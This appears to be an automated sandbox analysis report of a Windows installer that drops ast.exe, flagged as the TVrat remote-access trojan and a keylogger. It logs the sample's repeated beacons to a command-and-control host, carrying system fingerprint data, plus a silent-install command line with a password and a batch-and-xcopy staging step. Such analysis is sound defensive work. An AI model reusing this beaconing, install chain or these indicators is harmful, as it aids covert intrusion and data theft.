                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
                                                                                                                                          2024-11-19 17:58:05 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          49192.168.2.550154212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:06 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:06 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          50192.168.2.550157212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:07 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:07 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
                                                                                                                                          2024-11-19 17:58:07 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          51192.168.2.550160212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:08 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:08 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          52192.168.2.550163212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:13 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:13 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          53192.168.2.550166212.193.169.65443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:14 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:14 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
                                                                                                                                          2024-11-19 17:58:14 UTC166INHTTP/1.1 200 OK
                                                                                                                                          server: nginx/1.22.1
                                                                                                                                          date: Tue, 19 Nov 2024 17:58:14 GMT
                                                                                                                                          content-type: text/html
                                                                                                                                          content-length: 98
                                                                                                                                          cache-control: private
                                                                                                                                          connection: close
                                                                                                                                          2024-11-19 17:58:14 UTC98INData Raw: 01 13 00 00 62 00 00 00 00 00 00 00 00 00 00 00 57 a9 96 0c b1 d5 0a 4b 8a 61 c6 59 f6 ad a6 72 9c ad 00 00 23 00 00 00 74 72 73 30 31 34 2e 78 6e 2d 2d 38 30 61 6b 69 63 6f 6b 63 30 61 61 62 6c 63 2e 78 6e 2d 2d 70 31 61 69 0b 00 00 00 30 30 36 20 31 36 35 20 30 35 30 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: bWKaYr#trs014.xn--80akicokc0aablc.xn--p1ai006 165 050


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:12:56:01
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\Desktop\aeyh21MAtA.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\aeyh21MAtA.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'234'714 bytes
                                                                                                                                          MD5 hash:91444FBF43FBBB75B12DC51F3B5465EA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:12:56:01
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp" /SL5="$20454,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'757'184 bytes
                                                                                                                                          MD5 hash:7862449E145C354D01526B0F8FB3C283
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 2%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:12:56:01
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\Desktop\aeyh21MAtA.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'234'714 bytes
                                                                                                                                          MD5 hash:91444FBF43FBBB75B12DC51F3B5465EA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:12:56:02
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp" /SL5="$20464,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'757'184 bytes
                                                                                                                                          MD5 hash:7862449E145C354D01526B0F8FB3C283
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 2%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:12:56:37
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat""
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:12:56:37
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:12:56:37
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\"
                                                                                                                                          Imagebase:0x190000
                                                                                                                                          File size:43'520 bytes
                                                                                                                                          MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:12:57:04
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\template\ast.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'543'992 bytes
                                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:12:57:17
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\template\ast.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'543'992 bytes
                                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:12:57:26
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\template\ast.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'543'992 bytes
                                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:4.9%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:29.5%
                                                                                                                                            Total number of Nodes:2000
                                                                                                                                            Total number of Limit Nodes:40
                                                                                                                                            execution_graph 18729 6b772370 curl_easy_init 18730 6b772387 18729->18730 18732 6b772390 18729->18732 18731 6b7723c2 18732->18731 18735 6b781650 18732->18735 18736 6b78165f 18735->18736 18754 6b7723b8 18735->18754 18736->18754 18755 6b796bd0 18736->18755 18738 6b781675 18739 6b781689 18738->18739 18740 6b78167f curl_multi_remove_handle 18738->18740 18741 6b781690 curl_multi_cleanup 18739->18741 18742 6b7816a0 18739->18742 18740->18739 18741->18742 18761 6b781ce0 18742->18761 18756 6b796be2 18755->18756 18760 6b796c24 18755->18760 18756->18760 18765 6b7a9660 18756->18765 18758 6b796c11 18758->18760 18773 6b7a06b0 18758->18773 18760->18738 18762 6b781cf3 18761->18762 18763 6b781650 106 API calls 18762->18763 18764 6b781d1f 18763->18764 18766 6b7a9670 18765->18766 18771 6b7a96a1 18765->18771 18766->18771 18783 6b7a9340 18766->18783 18768 6b7a96e9 18768->18758 18769 6b7a96e0 18769->18768 18770 6b7a9340 5 API calls 18769->18770 18772 6b7a9746 18770->18772 18771->18758 18772->18758 18774 6b7a06cf 18773->18774 18782 6b7a0759 18773->18782 18776 6b7a06dc curl_mvsnprintf 18774->18776 18774->18782 18775 6b7bdb71 __fassign 5 API calls 18777 6b7a0767 18775->18777 18778 6b7a06fe 18776->18778 18779 6b7a0737 18776->18779 18777->18760 18778->18778 18781 6b7a072e curl_msnprintf 18778->18781 18798 6b7a0550 18779->18798 18781->18779 18782->18775 18784 6b7a9357 18783->18784 18785 6b7a9365 18783->18785 18790 6b7bdb71 18784->18790 18788 6b7bdb71 __fassign 5 API calls 18785->18788 18787 6b7a9361 18787->18769 18789 6b7a947d 18788->18789 18789->18769 18791 6b7bdb7a 18790->18791 18792 6b7bdb7c IsProcessorFeaturePresent 18790->18792 18791->18787 18794 6b7bdc76 18792->18794 18797 6b7bdc3a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18794->18797 18796 6b7bdd59 18796->18787 18797->18796 18799 6b7a0594 18798->18799 18803 6b7a0560 18798->18803 18800 6b7a05c7 18799->18800 18805 6b7c935e 18799->18805 18800->18782 18802 6b7a05b4 18804 6b7c935e 72 API calls 18802->18804 18803->18782 18804->18800 18806 6b7c936c 18805->18806 18807 6b7c9389 18805->18807 18806->18807 18808 6b7c938d 18806->18808 18809 6b7c9379 18806->18809 18807->18802 18818 6b7c913f 18808->18818 18810 6b7c1f49 __dosmaperr 14 API calls 18809->18810 18812 6b7c937e 18810->18812 18815 6b7cf18d 18812->18815 18826 6b7cf129 18815->18826 18817 6b7cf199 18817->18807 18819 6b7c914b __fassign 18818->18819 18844 6b7c20fc EnterCriticalSection 18819->18844 18821 6b7c9159 18845 6b7c919a 18821->18845 18827 6b7cf692 __dosmaperr 14 API calls 18826->18827 18828 6b7cf134 18827->18828 18831 6b7cf142 18828->18831 18834 6b7cf19d IsProcessorFeaturePresent 18828->18834 18830 6b7cf18c 18832 6b7cf129 __fassign 25 API calls 18830->18832 18831->18817 18833 6b7cf199 18832->18833 18833->18817 18835 6b7cf1a9 18834->18835 18838 6b7cefe1 18835->18838 18839 6b7ceffd __fassign 18838->18839 18840 6b7cf029 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18839->18840 18841 6b7cf0fa __fassign 18840->18841 18842 6b7bdb71 __fassign 5 API calls 18841->18842 18843 6b7cf118 GetCurrentProcess TerminateProcess 18842->18843 18843->18830 18844->18821 18855 6b7d0221 18845->18855 18852 6b7c918e 18982 6b7c2110 LeaveCriticalSection 18852->18982 18854 6b7c9177 18854->18802 18879 6b7d0094 18855->18879 18857 6b7d0232 18886 6b7d4f27 18857->18886 18859 6b7d0238 18863 6b7c91ae 18859->18863 18895 6b7d0ebd 18859->18895 18862 6b7cf7ea _free 14 API calls 18862->18863 18864 6b7c91dd 18863->18864 18867 6b7c91ef 18864->18867 18870 6b7c91c9 18864->18870 18865 6b7c91fd 18866 6b7c1f49 __dosmaperr 14 API calls 18865->18866 18868 6b7c9202 18866->18868 18867->18865 18867->18870 18873 6b7c9225 __fassign 18867->18873 18869 6b7cf18d __fassign 25 API calls 18868->18869 18869->18870 18875 6b7d02d4 18870->18875 18872 6b7d0094 25 API calls 18872->18873 18873->18870 18873->18872 18902 6b7cae11 18873->18902 18908 6b7cec35 18873->18908 18876 6b7d02df 18875->18876 18878 6b7c9166 18875->18878 18877 6b7cae11 70 API calls 18876->18877 18876->18878 18877->18878 18878->18852 18880 6b7d00b5 18879->18880 18881 6b7d00a0 18879->18881 18880->18857 18882 6b7c1f49 __dosmaperr 14 API calls 18881->18882 18883 6b7d00a5 18882->18883 18884 6b7cf18d __fassign 25 API calls 18883->18884 18885 6b7d00b0 18884->18885 18885->18857 18887 6b7d4f34 18886->18887 18889 6b7d4f41 18886->18889 18888 6b7c1f49 __dosmaperr 14 API calls 18887->18888 18890 6b7d4f39 18888->18890 18891 6b7d4f4d 18889->18891 18892 6b7c1f49 __dosmaperr 14 API calls 18889->18892 18890->18859 18891->18859 18893 6b7d4f6e 18892->18893 18894 6b7cf18d __fassign 25 API calls 18893->18894 18894->18890 18896 6b7d0efb 18895->18896 18900 6b7d0ecb __dosmaperr 18895->18900 18897 6b7c1f49 __dosmaperr 14 API calls 18896->18897 18899 6b7d0293 18897->18899 18898 6b7d0ee6 RtlAllocateHeap 18898->18899 18898->18900 18899->18862 18900->18896 18900->18898 18901 6b7d48a6 __dosmaperr 2 API calls 18900->18901 18901->18900 18903 6b7cae4e 18902->18903 18904 6b7cae29 18902->18904 18903->18873 18904->18903 18905 6b7d0094 25 API calls 18904->18905 18906 6b7cae47 18905->18906 18907 6b7cec35 70 API calls 18906->18907 18907->18903 18909 6b7cec41 __fassign 18908->18909 18910 6b7cec49 18909->18910 18911 6b7cec61 18909->18911 18933 6b7c1f36 18910->18933 18912 6b7cecfc 18911->18912 18918 6b7cec93 18911->18918 18914 6b7c1f36 __dosmaperr 14 API calls 18912->18914 18917 6b7ced01 18914->18917 18916 6b7c1f49 __dosmaperr 14 API calls 18932 6b7cec56 18916->18932 18919 6b7c1f49 __dosmaperr 14 API calls 18917->18919 18936 6b7d16ba EnterCriticalSection 18918->18936 18921 6b7ced09 18919->18921 18922 6b7cec99 18924 6b7cecca 18922->18924 18925 6b7cecb5 18922->18925 18937 6b7ced27 18924->18937 18926 6b7c1f49 __dosmaperr 14 API calls 18925->18926 18932->18873 18934 6b7cf692 __dosmaperr 14 API calls 18933->18934 18935 6b7c1f3b 18934->18935 18935->18916 18936->18922 18982->18854 18983 6b779870 18984 6b779882 18983->18984 18985 6b779879 18983->18985 18986 6b781650 106 API calls 18985->18986 18986->18984 21301 6b77bc70 21302 6b77bc7d 21301->21302 21313 6b77b160 21302->21313 21304 6b77bcb8 21305 6b77bd38 21304->21305 21342 6b792b70 curl_slist_free_all 21304->21342 21359 6b7927f0 21305->21359 21308 6b77bd44 21309 6b7bdb71 __fassign 5 API calls 21308->21309 21310 6b77bd56 21309->21310 21312 6b77bcd5 21312->21305 21354 6b792eb0 21312->21354 21314 6b7927f0 2 API calls 21313->21314 21315 6b77b171 21314->21315 21316 6b77b183 curl_mime_init 21315->21316 21317 6b77b17b 21315->21317 21318 6b77b1af curl_mime_subparts 21316->21318 21319 6b77b198 21316->21319 21317->21304 21321 6b77b3f6 21318->21321 21335 6b77b1c3 21318->21335 21320 6b7927f0 2 API calls 21319->21320 21322 6b77b1a3 21320->21322 21323 6b7927f0 2 API calls 21321->21323 21324 6b77b402 21321->21324 21322->21304 21323->21324 21324->21304 21325 6b77b1d6 curl_mime_addpart 21325->21335 21326 6b77b3e2 21328 6b7927f0 2 API calls 21326->21328 21327 6b77b240 curl_mime_addpart 21327->21335 21329 6b77b3ea 21328->21329 21329->21304 21330 6b77b25f curl_mime_headers 21330->21335 21331 6b77b203 curl_mime_init 21332 6b77b21c curl_mime_subparts 21331->21332 21331->21335 21332->21335 21333 6b77b283 curl_mime_type 21333->21335 21334 6b77bd60 curl_mime_name curl_mime_name 21334->21335 21335->21321 21335->21325 21335->21326 21335->21327 21335->21330 21335->21331 21335->21333 21335->21334 21336 6b77b393 curl_mime_data 21335->21336 21337 6b77b378 curl_mime_data_cb 21335->21337 21338 6b77b33b curl_mime_filedata 21335->21338 21339 6b77b3b5 curl_mime_filename 21335->21339 21340 6b77b31f curl_mime_data_cb 21335->21340 21341 6b77b351 